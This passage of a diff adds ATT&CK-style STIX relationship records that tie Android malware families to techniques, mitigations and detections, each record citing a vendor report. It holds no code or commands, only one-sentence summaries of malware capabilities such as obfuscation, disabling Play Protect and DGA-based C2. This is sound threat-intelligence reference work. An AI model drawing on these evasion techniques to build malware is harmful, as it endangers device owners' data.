+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 9 and above restricts access to the mic, camera, and other device sensors from applications running in the background. iOS 14 and Android 12 introduced a visual indicator on the status bar (green dot) when an application is accessing the device’s camera.(Citation: Android Capture Sensor 2019)", + "modified": "2022-04-01T13:56:12.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7b611c76-0ea1-49c5-9b9a-2e504a0bbe14", + "created": "2020-06-26T15:32:25.043Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. 
Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:53:04.417Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) disables Google Play Protect to prevent its discovery and deletion in the future.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b24553a7-01c7-49b2-b1e0-fb961e788de2", + "type": "relationship", + "created": "2020-06-26T15:32:25.062Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T15:32:25.062Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can obtain a list of installed applications.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be256f8a-8bae-4a00-8682-22797ba7e0ce", + "type": "relationship", + "created": "2019-09-04T14:28:15.975Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-10-14T17:51:38.054Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) queries the device for metadata such as make, model, and power levels.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f6f21954-c592-40d8-b7a0-75f332c42eaa", + "created": "2020-11-10T17:08:35.761Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. 
(2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:00:38.611Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has deleted call log entries coming from known C2 sources.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--44b63426-1ea7-456e-907b-0856e3eab0c3", + "type": "relationship", + "created": "2020-12-31T18:25:05.142Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." 
+ } + ], + "modified": "2020-12-31T18:25:05.142Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has collected the device’s location.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1f8b1ee1-e44b-4a37-a407-5cbceba35d87", + "type": "relationship", + "created": "2020-05-04T14:04:56.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "modified": "2020-05-04T15:40:21.305Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) has utilized JavaScript within WebViews that loaded a URL hosted on a Bread-controlled server which provided functions to run. 
[Bread](https://attack.mitre.org/software/S0432) downloads billing fraud execution steps at runtime.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b9b9ce86-89f6-41ea-8ba1-9520985acb49", + "type": "relationship", + "created": "2020-12-24T22:04:28.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:28.004Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has checked for system root.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f4aeacef-035c-4308-9e85-997703e27809", + "created": "2020-01-27T17:05:58.305Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). 
Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:27:33.906Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can delete arbitrary files on the device.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c943d462-fea7-4c01-88b2-de134153095b", + "created": "2023-03-20T18:56:37.473Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:56:37.473Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3c43d125-6719-420e-bb69-878cc91c2474", + "created": "2020-09-15T15:18:12.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). 
FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:45:11.727Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can register for the `BOOT_COMPLETED` broadcast Intent.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e4beccfa-a9a5-447d-8164-d39a1b2c5532", + "created": "2023-02-06T19:46:43.041Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:46:43.041Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) has included adversary-in-the-middle capabilities.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--07dd3318-2965-4085-be64-a8e956c7b8da", + "type": "relationship", + "created": "2020-12-18T20:14:47.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-18T20:14:47.319Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has stored encoded strings.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4b68bcb1-a512-40f7-9aee-235b3668f022", + "type": "relationship", + "created": "2020-01-27T17:05:58.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.271Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain clipboard contents.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--42342d72-a37c-477e-b8f1-1768273fcb7f", + "created": "2019-10-18T15:51:48.451Z", + "x_mitre_version": "1.0", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be advised not to grant consent for screen captures to occur 
unless expected. Users should avoid enabling USB debugging (Android Debug Bridge) unless explicitly required. ", + "modified": "2022-04-01T13:32:32.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c778593c-1583-48cc-a99d-0ac1b5b537e2", + "created": "2023-03-20T18:48:39.857Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:48:39.857Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ed7e9368-004c-484f-9eed-03b158325564", + "created": "2023-03-20T18:54:40.401Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:54:40.401Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--74c8c9e7-cd8b-4f3a-830d-a7e6e9668330", + "created": "2022-04-01T15:01:53.321Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can take appropriate action when jailbroken devices are detected, potentially limiting the adversary’s access to password stores.", + "modified": "2022-04-01T15:01:53.321Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--657f1d8c-3982-4ee5-95dc-c8ec3164cb2e", + "type": "relationship", + "created": "2020-07-15T20:20:59.382Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.382Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) has communicated with the C2 server over TCP port 7777.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b402664b-a5b4-45e4-832f-02638e6c67a7", + "created": "2022-04-01T14:59:17.991Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Mobile security products can take appropriate action when jailbroken devices are detected, potentially limiting the adversary’s access to password stores. ", + "modified": "2022-04-01T14:59:17.991Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ee9c1a8c-5f84-4571-8518-300a6412df0f", + "type": "relationship", + "created": "2019-09-23T13:36:08.448Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. 
Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "source_name": "securelist rotexy 2018" + } + ], + "modified": "2019-10-15T19:56:50.651Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) collects information about the compromised device, including phone number, network operator, OS version, device model, and the device registration country.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--85e0d8c5-b9d6-4a10-963a-aeb54eba4f02", + "created": "2020-06-26T15:32:25.144Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint Cerberus", + "description": "A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. 
Retrieved June 26, 2020.", + "url": "https://research.checkpoint.com/2020/mobile-as-attack-vector-using-mdm/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:10:26.480Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) communicates with the C2 server using HTTP.(Citation: CheckPoint Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1f32e107-aef9-42f8-84d1-4c4fcd863b7f", + "created": "2023-02-28T20:39:57.194Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:07:21.417Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use Domain Generation Algorithms to connect to the C2 server.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--fd211238-f767-4599-8c0d-9dca36624626", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--29357289-362c-447c-b387-9a38b50d7296", + "created": "2022-04-15T17:20:06.338Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + }, + { + "source_name": "Check Point-Joker", + "url": "https://research.checkpoint.com/2020/new-joker-variant-hits-google-play-with-an-old-trick/", + "description": "Hazum, A., Melnykov, B., Wernik, I.. (2020, July 9). New Joker variant hits Google Play with an old trick. Retrieved July 20, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Bread](https://attack.mitre.org/software/S0432) uses various tricks to obfuscate its strings including standard and custom encryption, programmatically building strings at runtime, and splitting unencrypted strings with repeated delimiters to break up keywords. [Bread](https://attack.mitre.org/software/S0432) has also abused Java and JavaScript features to obfuscate code. [Bread](https://attack.mitre.org/software/S0432) payloads have hidden code in native libraries and encrypted JAR files in the data section of an ELF file. [Bread](https://attack.mitre.org/software/S0432) has stored DEX payloads as base64-encoded strings in the Android manifest and internal Java classes.(Citation: Check Point-Joker)(Citation: Google Bread)", + "modified": "2022-04-15T17:20:06.338Z", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f7bebe78-2e21-466d-878b-f70be6c0e94a", + "created": "2021-01-07T17:02:31.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. 
Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:56:32.861Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can access the device's contact list.(Citation: Zscaler TikTok Spyware) ", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f92fe9dd-7296-42f6-904e-e245c438376e", + "created": "2020-12-14T15:02:35.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. 
Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:25:06.012Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can request device administrator permissions.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--34b6abb0-d199-46bb-af21-b65560e75658", + "created": "2022-04-01T19:06:40.361Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T19:06:40.361Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "target_ref": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--90d4d964-efa2-46ac-adc2-759886e07158", + "created": "2020-10-29T17:48:27.325Z", + 